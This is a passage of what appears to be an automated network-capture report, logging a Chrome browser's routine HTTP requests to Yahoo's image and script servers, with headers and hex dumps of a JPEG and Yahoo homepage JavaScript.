                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:36 UTC1300INData Raw: 3d 72 7c 7c 7a 3b 69 66 28 21 69 29 72 65 74 75 72 6e 20 73 65 74 54 69 6d 65 6f 75 74 28 74 2c 6e 29 3b 65 2e 68 61 73 28 69 29 7c 7c 65 2e 73 65 74 28 69 2c 6e 65 77 20 4d 61 70 29 3b 76 61 72 20 6f 3d 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 3d 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 73 6c 69 63 65 2e 63 61 6c 6c 28 61 72 67 75 6d 65 6e 74 73 29 3b 65 2e 67 65 74 28 69 29 2e 64 65 6c 65 74 65 28 6f 29 2c 74 2e 61 70 70 6c 79 28 74 68 69 73 2c 6e 29 7d 2c 6e 29 3b 72 65 74 75 72 6e 20 65 2e 67 65 74 28 69 29 2e 73 65 74 28 6f 2c 6f 29 2c 6f 7d 29 2c 63 6c 65 61 72 41 6c 6c 54 69 6d 65 6f 75 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 65 26 26 65 2e 73 69 7a 65 29 7b 76 61 72 20 74 3d 21 30 2c 6e 3d 21
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: =r||z;if(!i)return setTimeout(t,n);e.has(i)||e.set(i,new Map);var o=setTimeout(function(){var n=Array.prototype.slice.call(arguments);e.get(i).delete(o),t.apply(this,n)},n);return e.get(i).set(o,o),o}),clearAllTimeout:function(){if(e&&e.size){var t=!0,n=!


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              58192.168.2.45108087.248.119.2514431800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:36 UTC530OUTGET /uu/api/res/1.2/tXAWAMh378MREDEIQWaIbQ--~B/Zmk9c3RyaW07aD0xODA7cT04MDt3PTM1NjthcHBpZD15dGFjaHlvbg--/https://s.yimg.com/os/creatr-uploaded-images/2024-09/857b5ce0-855a-11ef-bdd7-52ddf2ff99a3.cf.webp HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:36 UTC1189INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: image/jpeg
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Disposition: inline; filename="857b5ce0-855a-11ef-bdd7-52ddf2ff99a3.webp"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Etag: "be311fc49c017fde715939bf1ff7a6e1"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Expiration: expiry-date="Mon, 07 Apr 2025 00:00:00 GMT", rule-id="delete fetch for mysterio after 180 days"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Last-Modified: Tue, 08 Oct 2024 09:54:31 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 10:24:43 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Server-Timing: cld-fastly;mitm=po;dur=1;cpu=0;start=2024-10-08T10:24:43.333Z;desc=hit,rtt;dur=92,content-info;desc="width=356,height=180,bytes=13942,owidth=4288,oheight=2413,obytes=985414,ef=(1,13,17,23,30)"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Disposition,ETag,Server-Timing,X-Content-Type-Options
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-request-id: ddf805872e3ee133f53639b58c48009e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Age: 31733
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              cld_id: ddf805872e3ee133f53639b58c48009e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-image-width: 356
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-image-height: 180
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Vary: Accept
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 30387
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:36 UTC1300INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 03 02 02 02 02 02 03 02 02 02 03 03 03 03 04 06 04 04 04 04 04 08 06 06 05 06 09 08 0a 0a 09 08 09 09 0a 0c 0f 0c 0a 0b 0e 0b 09 09 0d 11 0d 0e 0f 10 10 11 10 0a 0c 12 13 12 10 13 0f 10 10 10 ff db 00 43 01 03 03 03 04 03 04 08 04 04 08 10 0b 09 0b 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 ff c0 00 11 08 00 b4 01 64 03 01 11 00 02 11 01 03 11 01 ff c4 00 1d 00 00 01 04 03 01 01 00 00 00 00 00 00 00 00 00 00 06 03 04 05 07 01 02 08 00 09 ff c4 00 54 10 00 01 03 02 04 04 03 06 03 04 06 04 0b 05 09 00 01 02 03 04 05 11 00 06 12 21 07 13 31 41 08 22 51 14 32 61 71 81 91 15 23 a1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: JFIFCCdT!1A"Q2aq#
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:36 UTC1300INData Raw: 5c ab 51 59 24 f4 24 db 6b 60 91 9f 2b 9d 00 2e 43 e1 f7 ec 66 4d a8 35 42 a5 3c fc c7 6b a9 75 c5 a5 e3 e6 4b 6a 0c ad 40 93 6b 75 b8 b1 b8 51 1b 75 c1 0f c4 7f 5b 9f e5 09 11 37 99 40 93 47 75 85 bf 31 86 9c 43 21 1b ab 52 5f 03 40 1f e1 00 5f 14 94 1b ea 68 4d 86 39 2c d1 52 eb 0f 1a 8c c0 98 ec 68 36 2d a1 2d 92 10 a1 f1 52 ec 0f 61 f2 be 1a 8f 3d 92 d3 a8 92 cc 10 ff 00 06 a1 22 19 75 a4 30 cc 44 2d 68 29 0a 09 28 51 56 9b 9e e4 91 f4 07 16 aa 49 89 c8 4f e5 fb 41 58 55 57 e3 c7 8b 3d 51 1a 94 c4 b4 85 29 0a 04 68 b1 23 ca 08 bf 54 df ec 3e 38 bb f7 fe a5 47 59 58 b2 b1 27 dc 26 11 28 b0 99 54 17 a9 2d 2b da 35 2e c1 3f f4 a9 d4 91 e8 34 a8 74 3f d9 18 cb 1c 9c 7b f7 b8 80 7f 30 38 cd 2a 34 a9 6f a5 b4 c8 90 b0 e2 d4 de e1 6e 68 42 49 df 6b 90 2d b0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: \QY$$k`+.CfM5B<kuKj@kuQu[7@Gu1C!R_@_hM9,Rh6--Ra="u0D-h)(QVIOAXUW=Q)h#T>8GYX'&(T-+5.?4t?{08*4onhBIk-
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:36 UTC24INData Raw: 78 29 32 d4 88 89 01 77 29 5f 37 98 bd bb 5c 5b fd 9c 6c 14 a9 f9 9a 07
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: x)2w)_7\[l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:36 UTC1300INData Raw: 5d cb b2 aa 95 88 d2 16 81 22 5b 0c 97 17 cf d6 54 10 4e a3 71 60 34 d9 44 1d 5b 6e 70 35 0f a3 97 0c 9f 33 60 45 8b 16 4c 44 a9 85 c1 75 c5 d8 a8 9d 41 2a 37 41 f8 12 4d fa 9d f0 9a ea 83 56 42 78 d0 6f 22 8d 26 91 99 de 9a dc 7d 08 f6 25 7b 36 ff 00 b8 bd 4a 1f 6b 63 3c b6 ce d2 cb 4f 1f 64 7d 44 64 aa 3c 80 d3 1c d9 8c d3 4f 2d f2 ad 2a e6 95 1d 26 fd ae 14 81 f4 c3 ad be 4c 95 43 d2 ff 00 b9 35 95 5f 9b 43 a2 c3 a4 cf 8e 50 65 17 d6 1e e4 84 38 84 2d 41 41 b5 5b aa 49 41 3a 8e f7 52 49 be 35 1c fd 4d 31 9d 75 e7 28 9e c7 5c 86 d7 b4 04 96 a2 bc e7 bb ab 98 b4 85 fa fa 0c 2e 46 26 ea 31 2a a3 96 18 9c c4 09 13 61 ba 98 68 b4 bf cb 5a 9d 41 52 bc 9e 6f 28 de e0 5b 55 f6 de d8 2f 43 2d d7 0c 6b 5b 7d 9a fb 55 06 c4 4b b0 d7 35 cd 25 7b 8d 3b ab b7 75 1b
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ]"[TNq`4D[np53`ELDuA*7AMVBxo"&}%{6Jkc<Od}Dd<O-*&LC5_CPe8-AA[IA:RI5M1u(\.F&1*ahZARo([U/C-k[}UK5%{;u
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:36 UTC1300INData Raw: 48 55 52 e3 ad 33 51 2f b7 a5 bf 73 58 f2 a0 2a f6 bd 81 de f8 d2 9c 89 f3 76 a1 fe 70 75 f6 e5 4d 90 52 be 42 e2 2c cb 65 b7 02 34 45 4d 80 58 27 62 7c f7 3e b6 18 5d 61 a7 0c 1d a4 98 f1 65 4b 32 92 5d 8a 88 4d ca d6 fe ea 58 5a b7 51 f4 04 02 3e a3 19 eb a8 eb f1 90 a4 33 7e b2 e3 91 61 54 93 4c 43 8e 3b 01 2a 5a 96 9d 65 a2 09 4a 81 1b 7f 78 7f e9 85 a6 21 b4 88 c1 25 48 84 59 43 46 32 f9 aa 69 c0 a3 7d d0 ca 57 b7 c4 28 5b e9 8d 14 b4 22 b6 c4 a0 57 63 55 20 b9 0a 3a 6f 31 87 48 5b 80 dc 29 2a 00 d8 76 e9 63 b7 73 7e f8 63 33 ba 89 76 28 f1 f3 4c 0a 73 72 4a d3 1a 73 ec 05 21 07 6d 49 42 95 71 f3 28 1f 42 70 2e ae 4d 96 14 a0 7b 39 53 db 81 55 aa b9 09 4a 93 79 88 0f 25 24 5d 00 58 90 41 3b 5c 69 fb fc 37 26 e4 c7 92 d2 aa 09 2a b3 af 31 97 22 3a 63
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: HUR3Q/sX*vpuMRB,e4EMX'b|>]aeK2]MXZQ>3~aTLC;*ZeJx!%HYCF2i}W(["WcU :o1H[)*vcs~c3v(LsrJs!mIBq(Bp.M{9SUJy%$]XA;\i7&*1":c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:36 UTC1300INData Raw: fc f5 3d 1d 3a b5 25 68 65 a0 a2 e2 55 dc 12 55 6e f7 07 6d b7 c1 96 96 31 c2 cc a3 b5 60 85 6a 42 a4 e6 39 d0 c2 96 f3 6f 32 db 2f b8 55 b0 65 db ac 59 1e e8 3b 15 5f 7e 9b 8f 4c 8d ca 93 3a ae 41 da a5 72 a6 e7 ed 15 36 04 92 e3 08 62 33 21 49 70 b6 ea 15 cc e5 92 10 0d f4 db 71 6b ec 70 9a 93 3a f8 8f 82 d1 4a 09 a4 52 ab b7 d0 96 e9 69 69 48 22 e4 3a 54 ad fd 6c 6d b5 fd 0e 32 d3 29 d4 68 76 14 48 13 53 a5 38 bc bc 84 bf 25 7c c7 dc 7d d0 e2 5c d4 a4 a8 b0 a3 fa 00 00 fa 9d c1 c1 df e6 20 c1 a5 ff 00 e4 8a e1 7d 36 a8 b6 a5 ba a4 a2 34 d3 1b 9a e3 2e ac 25 26 eb 48 e7 02 7d d3 a4 12 46 e3 70 a1 b2 c0 1d 0a 5f a1 4f 18 34 a2 bb 21 2d 38 db 4f 25 0f 37 39 36 2d a0 a3 ce 91 65 14 83 b8 06 c3 7c 65 c9 6c 63 7a 55 30 6d 99 69 e8 8b 58 91 3e 62 4a 9d 53 af
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: =:%heUUnm1`jB9o2/UeY;_~L:Ar6b3!Ipqkp:JRiiH":Tlm2)hvHS8%|}\ }64.%&H}Fp_O4!-8O%796-e|elczU0miX>bJS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:36 UTC1300INData Raw: 95 98 b4 ba 7a 14 69 c5 90 e2 dc 6d 3a 52 ca 49 21 23 e1 ee 9c 7b c4 a5 1e aa 96 a9 82 be ce 79 95 97 4a 20 a5 dd 6a 42 b5 29 c2 6f bf a7 da c7 eb 8c d9 38 b3 ca 3a 4b aa f1 a4 a9 33 6e 64 a7 66 46 85 2e cd 4b 76 8b cc 6d c5 ac 79 9a 6d e2 10 ab 7f da 28 1b fc 71 e7 7a dd 2d 59 93 cf 75 b8 7f 31 5a e6 16 e9 30 a2 ce 98 23 a8 a9 50 8b 4a 52 c8 09 ba 1b 73 48 16 26 f6 b9 f4 eb 8e 2d 19 5f 49 1c 0a 2a 65 5c 5c 7d 0e 7b 4b f4 b0 87 ea b4 85 29 0d 39 72 5e 65 2b 04 10 a2 49 b8 d2 48 3b d8 81 82 59 12 a0 ee 62 fc ab 90 da 9d 26 aa e7 0a 68 eb 53 6e 97 df 8e b4 b7 ce d9 6a 57 39 c2 da 0f fd 92 37 f4 04 e2 4c 85 55 6e 69 1a 4c 87 51 6a 89 5c 99 22 02 93 39 25 f6 5a 8c 56 10 0a 4b 2e 06 48 27 60 ab 95 5c f6 05 38 6a 5c a9 19 4d 3f 4c 14 c9 55 c7 11 4e 98 ed 5d 93
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: zim:RI!#{yJ jB)o8:K3ndfF.Kvmym(qz-Yu1Z0#PJRsH&-_I*e\\}{K)9r^e+IH;Yb&hSnjW97LUniLQj\"9%ZVK.H'`\8j\M?LUN]
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:36 UTC1300INData Raw: 3e 46 fc 46 6b 2c b5 ec 6d f3 14 d0 b3 60 ea 40 50 00 81 b6 ea 02 f7 07 09 97 55 5a 53 31 4b de 80 17 2b e5 1c e3 32 9b 58 cc 95 34 d3 e9 94 f9 29 e5 45 fc c2 1c 2a b2 80 57 53 b1 be dd 3a 63 a9 8b 38 eb 93 a4 ad 4a 09 63 e6 67 72 96 56 7d 89 54 d8 95 46 61 c3 01 b5 49 60 b3 67 52 74 aa e7 de 09 26 ca b1 ec 7a e2 9d cf 9a 0c 4d 45 e8 3d c4 7a b3 df b3 91 ea 31 63 27 da 2a 0d b4 ea 14 81 d5 02 f6 fe 27 16 ae c7 96 32 9a 9b 7c 06 b9 3e a4 c6 47 c8 74 bc ce a0 f2 9b a3 57 d8 76 3b 6a 40 53 81 95 bb e4 08 49 20 81 bd c1 3b 82 7a 63 3e 26 54 66 ee 9d 1b 6a 2f 26 5b 52 f8 ff 00 94 72 8f 0c 25 27 38 d6 97 ed ef c9 e4 32 e2 fd d4 25 04 00 93 e8 2e 0e fd 31 f4 4c 4c a9 b1 27 7b 27 8b a8 a2 6a 5e 35 78 77 52 70 40 86 cb 8c 38 09 05 5a 02 d0 7d 08 23 a6 f6 b1 23 b9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: >FFk,m`@PUZS1K+2X4)E*WS:c8JcgrV}TFaI`gRt&zME=z1c'*'2|>GtWv;j@SI ;zc>&Tfj/&[Rr%'82%.1LL'{'j^5xwRp@8Z}##
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:36 UTC1300INData Raw: c7 ba 94 9e c0 6f 80 ed 1b 13 92 f7 de ea 33 4c a8 ae 5e 62 4c c7 1e 8d 21 e8 72 59 6d 41 47 75 25 64 d8 df a0 b6 9f d7 e1 86 76 8e 19 bf 15 ef 97 37 14 69 6d 51 32 4f e2 75 2a eb 29 87 54 79 b5 45 96 e9 3a 5b e6 5e ed 90 2e 75 24 8b 1f a6 30 e3 4b ab 4f a9 ce ab 8c c6 57 dc 3f af e5 79 31 13 4e 66 a7 1a a5 29 85 3a 96 54 b0 e3 4d 25 04 5d 47 a8 3e 54 a4 9b 91 6b 03 b6 1d 92 a1 08 74 f2 d8 b6 6b c9 8d e5 f9 85 8a fd 3a 33 91 24 30 25 47 5c 57 43 c8 71 a5 00 75 a1 57 20 83 fe 58 e5 25 52 aa 50 9e 5b fe 51 ba 9d cb 94 fa 77 e1 62 a4 d4 da 83 e9 6d 6a 2b ec d9 b2 9b b8 e8 93 a7 ae 3a 8a 96 d7 83 75 b5 c8 57 c2 bc cf 42 a2 a2 9d 22 a8 a8 10 51 cd 70 80 f3 a9 0b 53 da 14 6c 13 7b e9 1a 53 b7 4f 52 30 9c ac 47 b3 20 e4 50 9a 2d dc f9 9e d8 45 0e 3b d4 ea aa a2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: o3L^bL!rYmAGu%dv7imQ2Ou*)TyE:[^.u$0KOW?y1Nf):TM%]G>Tktk:3$0%G\WCquW X%RP[Qwbmj+:uWB"QpSl{SOR0G P-E;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:36 UTC1300INData Raw: 70 73 f2 96 a2 eb cb ed 7f 58 19 5f 30 e4 c6 a6 34 a5 c5 4f e2 51 83 e8 4a ec 95 ad cd 29 b2 48 2a 41 b5 c7 7d ce e6 f8 e5 a4 f1 ae ef 18 e9 c5 7e 48 18 39 61 ce 1d e4 39 2f 3f 19 b4 32 c5 29 6e b6 eb 69 3c 97 d2 e3 c5 c5 21 27 f7 ad 60 00 eb bd ec 2f 6c 22 5e 45 e9 34 ac 17 93 f5 47 f9 8b 26 a6 a4 d6 53 69 97 9a 72 1d 4e 3c 89 7a d3 6f cc 49 8e 10 0a 49 07 73 a4 9b 7a db d2 f8 dd 8b 73 9a 91 a5 60 76 c5 33 95 68 30 73 9f 0e ea b9 76 3a bd 91 ea 42 e3 ce 00 2f cc cb 21 ff 00 35 8e d7 f2 11 8e ba 5f 59 13 67 ea 0f f8 0f 5e f6 ec ae f3 ef 26 eb a7 29 e6 9d 51 55 d4 ad 6a 2b 04 9f 99 56 11 95 c5 e8 39 19 54 b4 c4 72 fc 99 15 69 b9 ca 73 ef 20 33 06 39 66 32 14 6d ac 04 28 83 7f 5b 85 2b e9 6c 21 a8 d2 3f b4 e2 96 58 90 29 dc d8 31 d5 2b 77 39 49 bd 87 c2 ff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: psX_04OQJ)H*A}~H9a9/?2)ni<!'`/l"^E4G&SirN<zoIIszs`v3h0sv:B/!5_Yg^&)QUj+V9Tris 39f2m([+l!?X)1+w9I


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              59192.168.2.45107987.248.119.2514431800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:36 UTC546OUTGET /cx/hp-viewer/desktop_1.11.185.modern.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referer: https://www.yahoo.com/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:36 UTC691INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-id-2: aXk30dKZP7QVuNDXha2QKkXadGGVYDXgJ9nKan/xipZSJ8anJimbcJc1M++Ir+DOcjQusToK0Es=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-request-id: C5WDZSP9RDV3JSB8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 05:46:53 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Last-Modified: Thu, 05 Sep 2024 14:01:06 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ETag: "bd4d30bf2431199179fa9afbdb1ccb76"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: public,max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 65865
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Age: 48404
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:36 UTC1300INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 63 6f 6e 73 74 20 65 3d 5b 22 66 69 6e 61 6e 63 65 2e 79 61 68 6f 6f 2e 63 6f 6d 22 2c 22 6e 65 77 73 2e 79 61 68 6f 6f 2e 63 6f 6d 22 2c 22 73 70 6f 72 74 73 2e 79 61 68 6f 6f 2e 63 6f 6d 22 5d 2c 74 3d 6e 65 77 20 52 65 67 45 78 70 28 2f 72 73 3d 22 28 5b 5e 22 5d 2a 29 22 2f 29 2c 69 3d 7b 6c 6d 73 69 64 3a 22 6c 6d 73 69 64 22 2c 6c 70 73 74 61 69 64 3a 22 6c 70 73 74 61 69 64 22 2c 6c 75 3a 22 6c 75 22 2c 70 63 74 3a 22 70 61 67 65 43 6f 6e 74 65 6e 74 54 79 70 65 22 2c 70 64 3a 22 70 61 67 65 44 65 73 69 67 6e 22 2c 70 6c 3a 22 70 6c 22 2c 70 74 3a 22 70 61 67 65 54 79 70 65 22 2c 72 65 76 73 70 3a 22 72 65 76 73 70 22 2c 76 65 72 3a 22 61 70 70 4e 61 6d 65 22 7d 2c 73 3d 5b
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: !function(){"use strict";const e=["finance.yahoo.com","news.yahoo.com","sports.yahoo.com"],t=new RegExp(/rs="([^"]*)"/),i={lmsid:"lmsid",lpstaid:"lpstaid",lu:"lu",pct:"pageContentType",pd:"pageDesign",pl:"pl",pt:"pageType",revsp:"revsp",ver:"appName"},s=[
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:36 UTC1300INData Raw: 61 61 73 2c 64 69 76 2e 77 61 66 65 72 2d 63 61 61 73 2d 63 6f 6d 70 6c 65 74 65 22 29 3b 72 65 74 75 72 6e 20 41 72 72 61 79 2e 66 72 6f 6d 28 69 29 2e 66 69 6e 64 49 6e 64 65 78 28 28 74 3d 3e 74 3d 3d 3d 65 29 29 2b 31 7d 2c 75 3d 28 29 3d 3e 77 69 6e 64 6f 77 2e 76 7a 6d 3f 2e 67 65 74 50 61 67 65 43 6f 6e 74 65 78 74 3f 2e 28 29 7c 7c 77 69 6e 64 6f 77 2e 59 41 48 4f 4f 3f 2e 63 6f 6e 74 65 78 74 2c 66 3d 28 29 3d 3e 7b 63 6f 6e 73 74 20 65 3d 75 28 29 3b 72 65 74 75 72 6e 20 53 74 72 69 6e 67 28 65 3f 2e 62 75 63 6b 65 74 7c 7c 65 3f 2e 62 75 63 6b 65 74 49 64 7c 7c 22 22 29 7d 3b 66 75 6e 63 74 69 6f 6e 20 67 28 65 29 7b 63 6f 6e 73 74 20 74 3d 5b 5d 3b 66 6f 72 28 63 6f 6e 73 74 20 69 20 69 6e 20 65 29 69 66 28 65 2e 68 61 73 4f 77 6e 50 72 6f 70
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: aas,div.wafer-caas-complete");return Array.from(i).findIndex((t=>t===e))+1},u=()=>window.vzm?.getPageContext?.()||window.YAHOO?.context,f=()=>{const e=u();return String(e?.bucket||e?.bucketId||"")};function g(e){const t=[];for(const i in e)if(e.hasOwnProp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:36 UTC1300INData Raw: 28 65 2c 74 29 3d 3e 7b 69 66 28 77 69 6e 64 6f 77 2e 62 65 6e 6a 69 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 2e 62 65 6e 6a 69 2e 75 70 64 61 74 65 49 31 33 4e 29 7b 63 6f 6e 73 74 7b 61 64 4d 65 74 61 3a 69 2c 73 70 61 63 65 49 64 3a 73 2c 68 6f 6d 65 70 61 67 65 55 72 6c 3a 6e 2c 70 72 65 73 65 6e 74 61 74 69 6f 6e 3a 61 7d 3d 65 2e 6d 65 74 61 2e 64 61 74 61 2c 72 3d 7b 7d 2c 63 3d 22 66 72 6f 6e 74 70 61 67 65 22 3d 3d 3d 74 7c 7c 22 66 70 22 3d 3d 3d 74 3b 72 2e 73 70 61 63 65 69 64 3d 69 2e 73 70 61 63 65 69 64 7c 7c 73 7c 7c 22 22 2c 69 2e 68 61 73 68 74 61 67 26 26 28 72 2e 68 61 73 68 74 61 67 3d 69 2e 68 61 73 68 74 61 67 2e 73 70 6c 69 74 28 22 3b 22 29 29 2c 63 26 26 69 2e 73 69 74 65 26 26 28 72 2e 73
